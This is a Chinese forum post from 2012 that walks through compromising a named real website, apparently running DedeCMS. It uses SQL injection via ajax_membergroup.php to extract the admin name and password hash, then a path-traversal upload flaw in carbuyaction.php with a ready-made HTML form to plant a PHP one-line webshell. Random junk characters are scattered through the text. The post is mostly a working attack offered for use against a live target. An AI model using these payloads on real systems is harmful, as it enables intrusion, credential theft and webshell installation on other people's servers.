①注入漏洞。! P- G) x" x. o. N6 _) B
这站 http://www.political-security.com/$ G2 B9 |3 O- t. [3 I( d
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
( _% N j& A: w& L" N! y: Bwww.political-security.com/data/mysql_error_trace.inc 爆后台. e x, `1 Z& |5 F3 _' q
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。# v% n" h' ], R3 R* A- {
然后写上语句
& L& v+ {1 o0 _/ A8 M0 u: ~( s [查看管理员帐号
$ P% Y4 t" l3 v* A; rhttp://www.political-security.co ... &membergroup=@`
/ ] ?; ~3 b. U
: X" _7 P- @; T8 cadmin
& K6 J h }' c" W3 i3 U' ?( b- t0 x2 _# f3 v
查看管理员密码. m |/ Z) r# P! \
http://www.political-security.co ... &membergroup=@`+ _7 [( Y9 L; m: w* E6 v
% d3 I) _- \+ @9 w: A
8d29b1ef9f8c5a5af429
2 S. Q: @& L) G( f& @5 F. h( [
* E7 b' o! z9 A2 ~2 m查看管理员密码4 O- V% O# z- ?5 r# N" o. V, h
, G/ n5 P+ Z. _2 J" N5 u, d
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
) H* m/ `) @1 N' ]- D- {; e, S7 }+ M" `& Y
8d2! W2 F }, o4 Q- @
9b1ef9f8c5a5af42
# c' W2 k1 t( G% E& Y% w- H5 E7 g9
. V! n4 \. _4 ~( M: F0 {( b8 H# [+ D
cmd5没解出来 只好测试第二个方法
4 h* J& n! K$ W
. [6 g. Q/ x7 t4 n
, x' ~- a! @1 o②上传漏洞:5 B( h {" Z, }- Q. @0 e0 L' l
R% m: N: t6 U4 q) V只要登陆会员中心,然后访问页面链接6 i0 s) E- n2 m( E6 D
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”. t1 P9 @9 O `
9 k7 ^! o8 r; c7 J5 ~2 g
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
% Q+ X+ S6 N. b- x- [ i4 [; ]# Z4 V4 L. K: c
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
5 u- g" }% J/ V) g1 ^* Q5 D. S2 ^- y; |0 R
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
7 y) a6 [. B s) S5 q% y1 P或者! F: t: w; G- Z, W- p2 r. F+ C
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对